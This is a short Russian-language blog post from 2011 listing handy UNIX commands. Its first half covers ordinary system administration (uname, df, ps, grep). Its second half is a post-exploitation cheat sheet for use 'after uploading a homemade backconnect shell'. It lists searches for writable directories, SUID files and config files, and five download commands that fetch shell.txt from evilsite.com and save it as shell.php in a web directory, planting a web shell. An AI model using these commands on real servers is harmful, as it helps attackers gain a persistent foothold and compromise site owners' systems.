пятница, 23 сентября 2011 г.

Полезные команды UNIX


Наиболее полезными командами будут:

  • 'uname -a' – выводит информацию о системе: версию, релиз ядра, сетевое имя системы, тип процессора, тип платформы и операционной системы;
  • 'cat /etc/issue' – выводит версию дистрибутива;
  • 'uptime' – показывает аптайм сервера;
  • 'chkconfig --list | more' – список запущенных/остановленных служб на всех уровнях выполнения;
  • 'last -[кол-во пользователей]' показывает список пользователей, входивших в систему в последнее время;
  • 'ps' – выводит список процессов, запущенных в данной сессии;
  • 'top' – список процессов, запущенных в системе;
  • 'df -h' – показывает объем занимаемого места на жестких дисках;
  • 'du -sh /home/username' - обьем занимаемого места для конкретной директории;
  • 'find [где] -type d -perm 0777 -ls' – выводит список директорий, доступных для записи;
  • 'egrep -v '^#|^[:blank:]*$' [файл]' - просмотр файла без комментариев и пустых строк (удобно для просмотра конфигов);
  • 'cat [файл]|grep word' – покажет только те строки файла 'файл', которые содержат слово 'word';
  • 'cat [файл]|less' – остановит вывод при достижении нижней границы экрана и продолжит построчно при нажатии клавиши Enter;
  • 'echo [текст] > out.txt' – направит вывод команды echo в файл out.txt;
  • 'echo [текст] >> out.txt' – добавит вывод команды echo в конец файла out.txt;
  • 'echo "[текст]`ls -la`"' – выведет на экран текст + вывод команды ls -la (то есть, в обратных кавычках сначала выполнится ls -la, а затем уже echo).

наиболее полезные команды для багоискателя после заливки самопального backconnect-шелла

1. Поиск директорий, доступных на запись, относительно текущей
find . -perm -2 -type d -ls
2. Поиск файлов с установленным SUID-битом
find / -type f -perm -04000 -ls
3. Поиск конфигурационных файлов
find / -type f -name "config*"
4. Поиск так называемых качалок
which wget; which curl; which lynx; which links; which fetch
5. Качалка wget
wget http://evilsite.com/shell.txt -O /home/user/www/shell.php
6. Качалка curl
curl http://evilsite.com/shell.txt -o /home/user/www/shell.php
7. Качалка links
links -source http://evilsite.com/shell.txt > /home/user/www/shell.php
8. Качалка lynx
lynx -source http://evilsite.com/shell.txt > /home/user/www/shell.php
9. Качалка fetch
fetch -o http://evilsite.com/shell.txt -p /home/user/www/shell.php
Автор: на
Ярлыки: ,

Комментариев нет:

Отправить комментарий

Подписаться на: Комментарии к сообщению (Atom)